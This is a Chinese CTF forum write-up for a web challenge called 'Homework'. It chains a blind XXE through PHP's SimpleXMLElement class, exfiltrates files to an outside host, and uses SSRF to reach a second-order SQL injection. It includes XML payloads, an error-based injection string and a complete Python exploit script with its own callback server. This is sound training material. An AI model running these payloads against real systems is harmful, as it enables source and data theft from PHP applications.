CTF论坛

标题: Homework WP [打印本页]

---

作者: 573v3n    时间: 2019-10-15 21:58
标题: Homework WP
## SimpleXMLElement 类XXE漏洞
首先是根据url格式和页面提示的calc类源码,猜测url参数是调用相关类和传入参数。

```
http://62.234.99.204:1006/show.php?module=calc&args[]=2&args[]=a&args[]=2
```


对原生类 `SimpleXMLElement` 进行调用，其中他的构造函数参数如下
`__construct(data,options,is_url,ns,is_prefix)`

<!---more--->

| 参数 | 描述 |
|:---:|:---:|
| data | 必需。形式良好的 XML 字符串或 XML 文档的路径或 URL。|
| options | 可选。规定附加的 Libxml 参数。
| is_url | 可选。规定 data 参数是否是 URL。默认是 false。|
| ns | 可选。|
| is_prefix | 可选。|

其中第一个参数url为自己服务器的xml文件，第二个参数随意填数字，可以找手册参考下，第三个参数必须为true，代表第一个参数为url

```
/show.php?module=SimpleXMLElement&args[]=http://193.8.83.174:34567/payload1.xml&args[]=4&args[]=true
```

> 第二个参数：https://www.php.net/manual/zh/libxml.constants.php

接下去就是按照常规blind xxe，进行读源码

> payload1.xml
```
<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://111.111.111.111:23333/payload2.xml">
    %remote; %intern; %xxe;
]>
```


> payload2.xml
```
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://111.111.111.111:23333/?data=%payl;'>">
```


逐个得到所有源码，开始审计

## 二次注入+XXE的SSRF


读源码，发现所有入库的参数，都经过`w_addslashes`过滤，并且在数据库语句中用单引号包裹，但是，只有在`function.php`的23行的sig参数，虽然有过滤，但是没有用单引号包裹，可以用hex编码传入字符串，包括单引号等特殊字符，不受`w_addslashes`影响。
并且，show.php中存在一个只能本地访问才可启用的方法，`$_GET['action']=="view"`时可以用`$_GET['filename']`读取上传的文件内容。在每次读取内容时，更新sig的值，此时带入了先前查询出的sig，虽然有单引号包裹，但可以由上一步的hex转码传入不受过滤的单引号，造成注入。

因此先上传一个文件，内容无所谓，但文件名必须不能重复。修改sig为hex编码的注入语句。

> xxrf的payload2.xml
```
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/show.php?action=view&filename=上传的文件名称">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://111.111.111.111:23333/?data=%payl;'>">
```

再次回弹，得到ssrf访问的页面内容，即可进行注入。可以采用报错注入。

流程到此结束。

## 代码

```python
from http.server import BaseHTTPRequestHandler
import http
import socketserver
import argparse
import base64
import socket
import _thread
import time
import re
import random
import string
import requests


class myhttpserver(BaseHTTPRequestHandler):

    def respPayload(self, payloadid):
        xml1 = '''<!DOCTYPE root [
    <!ENTITY % remote SYSTEM "http://''' + "{}:{}".format(HOST, PORT) + '''/payload2.xml">
    %remote; %intern; %xxe;
]>'''
        xml2 = '''<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=''' + \
               (("http://127.0.0.1/show.php?action=view&filename=" + UPFILE) if SSRF else PAYLOAD) + '''">
<!ENTITY % intern "<!ENTITY &#37; xxe SYSTEM 'http://''' + "{}:{}".format(HOST, PORT) + '''/?data=%payl;'>">'''

        if payloadid == 1:
            print(xml1)
            return xml1
        else:
            print(xml2)
            return xml2

    def do_GET(self):
        # return all todos
        re_recv_base64 = re.compile('''(?<=/\?data=).+''')
        if (self.path.find("payload1.xml") != -1):
            data = self.respPayload(1)
        elif (self.path.find("payload2.xml") != -1):
            data = self.respPayload(2)
        elif (re_recv_base64.search(self.path)):
            print("Recv Base64 data")
            data = re_recv_base64.findall(self.path)[0]
            data = base64.b64decode(data)
            print(data)
            data = "Bye"
        else:
            print(self.path)
            self.send_error(404, "File not found.")
            return

        self.send_response(200)
        self.send_header('Content-type', 'text/xml')
        self.end_headers()
        self.wfile.write(data.encode())
        if data == "Bye":
            httpd.shutdown()


def server_start():
    global httpd
    Handler = myhttpserver
    httpd = socketserver.TCPServer(("", PORT), Handler)

    print("serving at {}:{}".format(HOST, PORT))
    httpd.serve_forever()


def sendpayload(payload):
    time.sleep(2)
    payload = "0x" + base64.b16encode(payload.encode()).decode()

    headers = {"Cookie": "cookie-check=582bd94d1e69c38b4e4c8f20cfe8ddb1; user=zzaa"}
    upfile_url = "http://62.234.99.204:1006/submit.php"
    xxe_url = "http://62.234.99.204:1006/show.php?module=SimpleXMLElement&args[]=http://" + "{}:{}".format(HOST,
                                                                                                           PORT) + "/payload1.xml&args[]=2&args[]=true"
    files = {"file": (UPFILE, "data")}
    data = {"sig": payload}
    proxies = {"http": "127.0.0.1:8080"}

    # r = requests.post(upfile_url, data=data, files=files, headers=headers, proxies=proxies)
    r = requests.post(upfile_url, data=data, files=files, headers=headers)
    time.sleep(1)
    # r = requests.get(xxe_url, headers=headers, proxies=proxies)
    r = requests.get(xxe_url, headers=headers)


def main():
    global HOST
    global PORT
    global UPFILE
    global SSRF
    global PAYLOAD
    parser = argparse.ArgumentParser(description='Write up for Homework')
    parser.add_argument('-H', '--HOST', help='local ip', required=True)
    parser.add_argument('-ssrf', '--SSRF', help='Is ssrf or xxe read file.', action="store_true")
    parser.add_argument('-p', '--PAYLOAD', default="index.php",
                        help='The payload for SQL injection or the file path for XXE')
    args = parser.parse_args()

    SSRF = args.SSRF
    HOST = args.HOST
    PAYLOAD = args.PAYLOAD
    # HOST = "0.0.0.0"
    PORT = random.randint(20000, 65535)
    UPFILE = "".join(random.sample(string.ascii_letters + string.digits, 8))

    print("{}:{} {}".format(HOST, PORT, UPFILE))
    _thread.start_new_thread(sendpayload, (PAYLOAD,))

    server_start()
    # listen_resp()


if __name__ == "__main__":
    main()

```


> 需要独立ip的公网服务器上执行
> 测试环境python3.7

```
Usage:
python poc.py -H yourip -p config.php
python poc.py -H yourip -ssrf -p "' and updatexml(1,concat(0x7e,mid(((select flag from flag)),1,20),0x7e),1)#"
```

---

欢迎光临 CTF论坛 (https://www.bugku.com/)

Powered by Discuz! X3.4